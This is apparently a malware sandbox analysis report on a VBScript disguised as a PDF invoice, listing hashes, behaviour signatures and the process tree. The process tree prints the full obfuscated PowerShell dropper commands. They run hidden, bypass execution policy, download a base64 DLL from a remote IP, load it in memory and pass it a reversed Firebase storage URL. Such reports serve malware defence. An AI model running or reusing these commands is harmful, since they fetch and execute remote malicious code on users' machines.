Analysis

  • max time kernel
    94s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    30-12-2024 03:13

General

  • Target

    RFAU02GSHKOPSFDQW_002_PDF.vbs

  • Size

    222KB

  • MD5

    f212536d8cdf98f7284837ee48886346

  • SHA1

    7fe473d02fe0dc783b6021c792abca338dc4e11f

  • SHA256

    91f8e59475196b2ab33f9e5e22beb04d3ee039985abe1572a4a6e7b3f6f8b74d

  • SHA512

    08524a86d5b9f53953e9587286e7210c48ee403e99c67f13dbdd5081a7d558c58541c4e95b6ca640a98a5e5d8a634127801767655b168fa8889357d3319880c6

  • SSDEEP

    192:Oply3gSajcsbpS1zQ1QXDebjDqNBft1hx8+W6h8VDvwAv1CjIc:ODokghw1HqR98dfH1Cjj

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://20.106.255.48/dll/TESTING.txt

Signatures

  • Blocklisted process makes network request (1 IoC)
  • Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)

    Run Powershell and hide display window.

  • Checks computer location settings (2 TTPs, 1 IoC)

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses (4 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of WriteProcessMemory (4 IoCs)

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFAU02GSHKOPSFDQW_002_PDF.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3148
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC❤Hk❤d❤Bl❤Fs❤XQBd❤C❤❤J❤BE❤Ew❤T❤❤g❤D0❤I❤Bb❤FM❤eQBz❤HQ❤ZQBt❤C4❤QwBv❤G4❤dgBl❤HI❤d❤Bd❤Do❤OgBG❤HI❤bwBt❤EI❤YQBz❤GU❤Ng❤0❤FM❤d❤By❤Gk❤bgBn❤Cg❤K❤BO❤GU❤dw❤t❤E8❤YgBq❤GU❤YwB0❤C❤❤TgBl❤HQ❤LgBX❤GU❤YgBD❤Gw❤aQBl❤G4❤d❤❤p❤C4❤R❤Bv❤Hc❤bgBs❤G8❤YQBk❤FM❤d❤By❤Gk❤bgBn❤Cg❤JwBo❤HQ❤d❤Bw❤Do❤Lw❤v❤DI❤M❤❤u❤DE❤M❤❤2❤C4❤Mg❤1❤DU❤Lg❤0❤Dg❤LwBk❤Gw❤b❤❤v❤FQ❤RQBT❤FQ❤SQBO❤Ec❤LgB0❤Hg❤d❤❤n❤Ck❤KQ❤7❤Fs❤UwB5❤HM❤d❤Bl❤G0❤LgBB❤H❤❤c❤BE❤G8❤bQBh❤Gk❤bgBd❤Do❤OgBD❤HU❤cgBy❤GU❤bgB0❤EQ❤bwBt❤GE❤aQBu❤C4❤T❤Bv❤GE❤Z❤❤o❤CQ❤R❤BM❤Ew❤KQ❤u❤Ec❤ZQB0❤FQ❤eQBw❤GU❤K❤❤n❤EY❤aQBi❤GU❤cg❤u❤Eg❤bwBt❤GU❤Jw❤p❤C4❤RwBl❤HQ❤TQBl❤HQ❤a❤Bv❤GQ❤K❤❤n❤FY❤QQBJ❤Cc❤KQ❤u❤Ek❤bgB2❤G8❤awBl❤Cg❤J❤Bu❤HU❤b❤Bs❤Cw❤I❤Bb❤G8❤YgBq❤GU❤YwB0❤Fs❤XQBd❤C❤❤K❤❤n❤DU❤Mg❤1❤Dk❤M❤Bl❤GI❤Yg❤w❤DI❤NQ❤0❤C0❤O❤❤z❤Dc❤OQ❤t❤DQ❤Yg❤1❤DQ❤LQBi❤Dc❤ZgBl❤C0❤Mw❤x❤GI❤YwBh❤GY❤N❤❤2❤D0❤bgBl❤Gs❤bwB0❤CY❤YQBp❤GQ❤ZQBt❤D0❤d❤Bs❤GE❤PwB0❤Hg❤d❤❤u❤D❤❤MgBB❤FI❤RQ❤v❤G8❤LwBt❤G8❤Yw❤u❤HQ❤bwBw❤HM❤c❤Bw❤GE❤Lg❤w❤Dc❤N❤Bm❤GY❤LQBz❤HI❤LwBi❤C8❤M❤B2❤C8❤bQBv❤GM❤LgBz❤Gk❤c❤Bh❤GU❤b❤Bn❤G8❤bwBn❤C4❤ZQBn❤GE❤cgBv❤HQ❤cwBl❤HM❤YQBi❤GU❤cgBp❤GY❤Lw❤v❤Do❤cwBw❤HQ❤d❤Bo❤Cc❤KQ❤p❤❤==';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('❤','A') ) ).replace('%testinmg%','');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3120
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.255.48/dll/TESTING.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('52590ebb0254-8379-4b54-b7fe-31bcaf46=nekot&aidem=tla?txt.02ARE/o/moc.topsppa.074ff-sr/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4252

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    2f57fde6b33e89a63cf0dfdd6e60a351

    SHA1

    445bf1b07223a04f8a159581a3d37d630273010f

    SHA256

    3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

    SHA512

    42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

    MD5

    d8b9a260789a22d72263ef3bb119108c

    SHA1

    376a9bd48726f422679f2cd65003442c0b6f6dd5

    SHA256

    d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

    SHA512

    550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0c5f5wqv.teo.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/3120-0-0x00007FFA102C3000-0x00007FFA102C5000-memory.dmp

    Filesize

    8KB

  • memory/3120-10-0x000001DB2C090000-0x000001DB2C0B2000-memory.dmp

    Filesize

    136KB

  • memory/3120-11-0x00007FFA102C0000-0x00007FFA10D81000-memory.dmp

    Filesize

    10.8MB

  • memory/3120-12-0x00007FFA102C0000-0x00007FFA10D81000-memory.dmp

    Filesize

    10.8MB

  • memory/3120-22-0x00007FFA102C3000-0x00007FFA102C5000-memory.dmp

    Filesize

    8KB

  • memory/3120-23-0x00007FFA102C0000-0x00007FFA10D81000-memory.dmp

    Filesize

    10.8MB

  • memory/3120-29-0x00007FFA102C0000-0x00007FFA10D81000-memory.dmp

    Filesize

    10.8MB